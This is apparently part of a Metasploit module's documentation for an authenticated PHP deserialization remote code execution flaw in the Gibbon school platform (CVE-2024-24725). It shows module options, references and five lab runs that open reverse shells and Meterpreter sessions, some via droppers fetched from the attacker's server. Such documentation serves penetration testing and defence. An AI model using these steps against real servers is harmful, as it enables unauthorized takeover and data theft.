  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an
                                      address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT  8080             yes       The local port to listen on.

Payload information:

Description:
  A Remote Code Execution vulnerability in Gibbon online school platform version 26.0.00 and lower
  allows remote authenticated users to conduct PHP deserialization attacks via columnOrder in a
  POST request to the endpoint `/modules/System%20Admin/import_run.php&type=externalAssessment&step=4`.
  As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,
  potentially resulting in complete system compromise, data exfiltration, or unauthorized access
  to sensitive information.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2024-24725
  https://attackerkb.com/topics/ogKGAB44BP/cve-2024-24725
  https://packetstormsecurity.com/files/177635
  https://www.exploit-db.com/exploits/51903


View the full module info with the info -d command.
```
## Scenarios
### Target 0 - PHP native `php/meterpreter/reverse_tcp` session
```shell
msf6 exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > set rport 80
rport => 80
msf6 exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > set ssl false
ssl => false
msf6 exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > set username cuckoo@clock.com
username => cuckoo@clock.com
msf6 exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > set password dingdong
password => dingdong
msf6 exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > set rhosts 192.168.201.4
rhosts => 192.168.201.4
msf6 exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > set lhost 192.168.201.8
lhost => 192.168.201.8
msf6 exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.4:80 can be exploited.
[+] The target appears to be vulnerable. Gibbon v26.0.00
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 192.168.201.4
[+] Deleted FaYSQoZdlBg.php
[*] Meterpreter session 5 opened (192.168.201.8:4444 -> 192.168.201.4:49958) at 2024-04-01 15:07:30 +0000

meterpreter > sysinfo
Computer    : WIN-BJDNH44EEDB
OS          : Windows NT WIN-BJDNH44EEDB 10.0 build 17763 (Windows Server 2016) AMD64
Meterpreter : php/windows
meterpreter > getuid
Server username: SYSTEM
meterpreter > pwd
C:\wamp64\www
meterpreter >
```
### Target 1 - Unix Command `cmd/unix/reverse_bash` session
```shell
msf6 exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > set target 1
target => 1
msf6 exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.44:80 can be exploited.
[+] The target appears to be vulnerable. Gibbon v26.0.00
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Command shell session 2 opened (192.168.201.8:4444 -> 192.168.201.44:33118) at 2024-04-01 19:51:43 +0000

pwd
/var/www
uname -a
Linux cuckoo 5.15.0-101-generic #111-Ubuntu SMP Tue Mar 5 20:16:58 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),29(audio)
```
### Target 2 - Linux Dropper `linux/x64/meterpreter/reverse_tcp` session
```shell
msf6 exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > set target 2
target => 2
msf6 exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.44:80 can be exploited.
[+] The target appears to be vulnerable. Gibbon v26.0.00
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.201.8:8080/gn2mFk
[*] Client 192.168.201.44 (Wget/1.21.2) requested /gn2mFk
[*] Sending payload to 192.168.201.44 (Wget/1.21.2)
[*] Sending stage (3045380 bytes) to 192.168.201.44
[*] Meterpreter session 3 opened (192.168.201.8:4444 -> 192.168.201.44:46276) at 2024-04-01 19:57:04 +0000
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.201.44
OS           : Ubuntu 22.04 (Linux 5.15.0-101-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: www-data
meterpreter > exit
```
### Target 3 - Windows Command `cmd/windows/powershell/x64/meterpreter/reverse_tcp` session
```shell
msf6 exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > set target 3
target => 3
msf6 exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.4:80 can be exploited.
[+] The target appears to be vulnerable. Gibbon v26.0.00
[*] Executing Windows Command for cmd/windows/powershell/x64/meterpreter/reverse_tcp
[*] Sending stage (201798 bytes) to 192.168.201.4
[*] Meterpreter session 6 opened (192.168.201.8:4444 -> 192.168.201.4:49962) at 2024-04-01 15:11:38 +0000

meterpreter > sysinfo
Computer        : WIN-BJDNH44EEDB
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```
### Target 4 - Windows Dropper `windows/x64/meterpreter/reverse_tcp` session
```shell
msf6 exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > set target 4
target => 4
msf6 exploit(multi/http/gibbon_auth_rce_cve_2024_24725) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.4:80 can be exploited.
[+] The target appears to be vulnerable. Gibbon v26.0.00
[*] Executing Windows Dropper for windows/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.201.8:8080/877P8aB3
[*] Client 192.168.201.4 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1) requested /877P8aB3
[*] Sending payload to 192.168.201.4 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1)
[*] Sending stage (201798 bytes) to 192.168.201.4
[*] Meterpreter session 7 opened (192.168.201.8:4444 -> 192.168.201.4:49967) at 2024-04-01 15:13:43 +0000
[*] Command Stager progress - 100.00% done (147/147 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer        : WIN-BJDNH44EEDB
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```

## Limitations
No limitations except for the fact that you need valid login credentials.
